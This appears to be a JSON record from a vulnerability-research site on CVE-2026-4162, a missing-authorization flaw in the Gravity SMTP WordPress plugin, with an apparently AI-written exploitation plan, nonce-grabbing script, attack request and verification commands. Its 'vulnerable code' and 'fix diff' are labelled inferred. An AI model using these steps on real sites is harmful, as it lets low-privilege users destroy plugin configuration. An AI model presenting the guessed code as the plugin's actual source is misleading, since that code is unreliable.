[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYA9VzArEAYAmmwc176GuGWIB7JiDxDPBDZh5xbQaQms":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-4162","gravity-smtp-missing-authorization-to-authenticated-subscriber-plugin-uninstall","Gravity SMTP \u003C= 2.1.4 - Missing Authorization to Authenticated (Subscriber+) Plugin Uninstall","The Gravity SMTP plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to uninstall and deactivate the plugin and delete plugin options. NOTE: This vulnerability is also exploitable via a Cross-Site Request Forgery vector.","gravitysmtp",null,"\u003C=2.1.4","2.1.5","high",7.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:L","Missing Authorization","2026-04-09 21:01:07","2026-04-10 09:25:59",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0f9d18a4-262b-4011-91e9-b29a27a76470?source=api-prod",1,[],"researched",false,3,"This research plan targets CVE-2026-4162, a missing authorization vulnerability in Gravity SMTP \u003C= 2.1.4.\n\n### 1. Vulnerability Summary\nGravity SMTP contains an AJAX handler designed to uninstall the plugin, deactivate it, and wipe its configuration from the database. The vulnerability exists because the function handling this request performs a nonce check (preventing simple unauthenticated CSRF) but fails to verify if the requesting user has administrative privileges (missing `current_user_can('manage_options')`). Consequently, any authenticated user, including those with the Subscriber role, can trigger the uninstallation.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `gravitysmtp_uninstall` (inferred based on plugin slug and functionality)\n*   **HTTP Method:** `POST`\n*   **Payload Parameters:**\n    *   `action`: `gravitysmtp_uninstall`\n    *   `_nonce`: The AJAX nonce for the gravitysmtp scope.\n*   **Authentication:** Authenticated (Subscriber role or higher).\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers an AJAX handler in its initialization phase:\n    `add_action( 'wp_ajax_gravitysmtp_uninstall', [ $this, 'handle_uninstall' ] );`\n2.  **Entry Point:** A Subscriber sends a `POST` request to `admin-ajax.php` with `action=gravitysmtp_uninstall`.\n3.  **Missing Check:** The handler function (e.g., `handle_uninstall`) likely calls `check_ajax_referer( 'gravitysmtp_uninstall', '_nonce' )`.\n4.  **The Flaw:** After the nonce check, the code immediately proceeds to:\n    *   `deactivate_plugins( 'gravitysmtp\u002Fgravitysmtp.php' )`\n    *   `delete_option( 'gravitysmtp_settings' )`\n    *   (Optionally) Dropping custom database tables.\n5.  **Sink:** It lacks a `if ( ! current_user_can( 'manage_options' ) ) wp_die();` check before execution.\n\n### 4. Nonce Acquisition Strategy\nThe Gravity SMTP plugin uses a localized JavaScript object to provide nonces to its admin interface. While Subscribers cannot access the plugin's settings page, Gravity SMTP often enqueues its core admin scripts and localizes data on the general WordPress Dashboard (`\u002Fwp-admin\u002Findex.php`) which Subscribers *can* access.\n\n**Steps to obtain the nonce:**\n1.  Log in as a Subscriber.\n2.  Navigate to the WordPress Dashboard: `\u002Fwp-admin\u002Findex.php`.\n3.  Use `browser_eval` to search for the localized object.\n4.  **Localized Variable Name:** `gravity_smtp_admin` (inferred) or `gravitysmtp_admin` (inferred).\n5.  **Nonce Key:** `nonce` or `uninstall_nonce` (inferred).\n\n**Script to execute in `browser_eval`:**\n```javascript\n\u002F\u002F Check common Gravity localized objects\n(function() {\n    const data = window.gravity_smtp_admin || window.gravitysmtp_admin || {};\n    return data.nonce || data.uninstall_nonce || \"nonce_not_found\";\n})();\n```\n\n### 5. Exploitation Strategy\n1.  **Preparation:** Authenticate the session as a Subscriber user.\n2.  **Discovery:** Execute the `browser_eval` script above to capture the `_nonce`.\n3.  **Execution:** Use `http_request` to send the malicious payload.\n\n**HTTP Request Details:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   `Cookie`: [Subscriber Session Cookies]\n*   **Body:**\n    ```\n    action=gravitysmtp_uninstall&_nonce=[EXTRACTED_NONCE]\n    ```\n\n### 6. Test Data Setup\n1.  Install and activate **Gravity SMTP 2.1.4**.\n2.  Configure basic SMTP settings so that `gravitysmtp_settings` option exists in the database.\n3.  Create a Subscriber user:\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n\n### 7. Expected Results\n*   **Response:** The server should return a successful status code (200 OK) and likely a JSON response `{\"success\": true}`.\n*   **Immediate Effect:** The plugin `gravitysmtp` will be deactivated.\n*   **Data Destruction:** The WordPress option `gravitysmtp_settings` (or similar configuration keys) will be deleted from the `wp_options` table.\n\n### 8. Verification Steps\n1.  **Check Plugin Status:**\n    `wp plugin is-active gravitysmtp`\n    (Expected: Exit code 1 \u002F Failure, meaning it is inactive).\n2.  **Check Configuration Deletion:**\n    `wp option get gravitysmtp_settings`\n    (Expected: \"Error: Could not get 'gravitysmtp_settings' option\").\n3.  **Check Database:**\n    `wp db query \"SELECT * FROM wp_options WHERE option_name LIKE 'gravitysmtp%'\" `\n    (Expected: Empty set or missing core configuration keys).\n\n### 9. Alternative Approaches\nIf `gravitysmtp_uninstall` is not the correct action name, investigate the following alternatives via `grep` in the plugin directory before attempting the exploit:\n1.  **Search for AJAX registrations:**\n    `grep -rn \"wp_ajax_\" wp-content\u002Fplugins\u002Fgravitysmtp\u002F`\n2.  **Search for uninstallation keywords:**\n    `grep -rn \"uninstall\" wp-content\u002Fplugins\u002Fgravitysmtp\u002F`\n    `grep -rn \"deactivate_plugins\" wp-content\u002Fplugins\u002Fgravitysmtp\u002F`\n3.  **Alternative Action Names:** `gravitysmtp_setup_uninstall`, `gravitysmtp_delete_data`, `gravitysmtp_reset_settings`.\n4.  **Alternative Nonce Search:** If the nonce is not in `window.gravity_smtp_admin`, search all script tags for strings matching the pattern `[a-f0-9]{10}` near the word \"nonce\".","Gravity SMTP versions up to 2.1.4 allow authenticated users with low privileges (Subscriber-level and above) to deactivate the plugin and wipe its configuration. This is caused by an AJAX handler that verifies a security nonce but fails to check for administrative permissions.","\u002F\u002F Inferred AJAX registration\nadd_action( 'wp_ajax_gravitysmtp_uninstall', [ $this, 'handle_uninstall' ] );\n\n---\n\n\u002F\u002F Inferred vulnerable handler in gravity-smtp plugin files\npublic function handle_uninstall() {\n    \u002F\u002F Nonce check prevents unauthenticated CSRF but not unauthorized authenticated access\n    check_ajax_referer( 'gravitysmtp_uninstall', '_nonce' );\n\n    \u002F\u002F Vulnerability: No check for current_user_can( 'manage_options' )\n\n    $this->uninstall_plugin(); \u002F\u002F Performs deactivation and data deletion\n    wp_send_json_success();\n}","--- a\u002Fsrc\u002FLegacy\u002FHandler\u002FUninstallHandler.php\n+++ b\u002Fsrc\u002FLegacy\u002FHandler\u002FUninstallHandler.php\n@@ -5,6 +5,10 @@\n \tpublic function handle_uninstall() {\n \t\tcheck_ajax_referer( 'gravitysmtp_uninstall', '_nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( [ 'message' => __( 'You do not have permission to perform this action.', 'gravitysmtp' ) ], 403 );\n+\t\t}\n+\n \t\t$this->uninstall_plugin();\n \t\twp_send_json_success();\n \t}","1. Login to the target WordPress site as a Subscriber-level user.\n2. Access the WordPress Dashboard (\u002Fwp-admin\u002Findex.php) and inspect the localized JavaScript objects (e.g., gravitysmtp_admin) in the page source to extract the 'nonce' value for the gravitysmtp_uninstall action.\n3. Send an authenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the following payload: action=gravitysmtp_uninstall&_nonce=[EXTRACTED_NONCE].\n4. The plugin will execute the uninstall routine, resulting in the plugin being deactivated and its database options (settings) being deleted.","gemini-3-flash-preview","2026-04-16 16:13:12","2026-04-16 16:13:37",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgravitysmtp\u002Ftags"]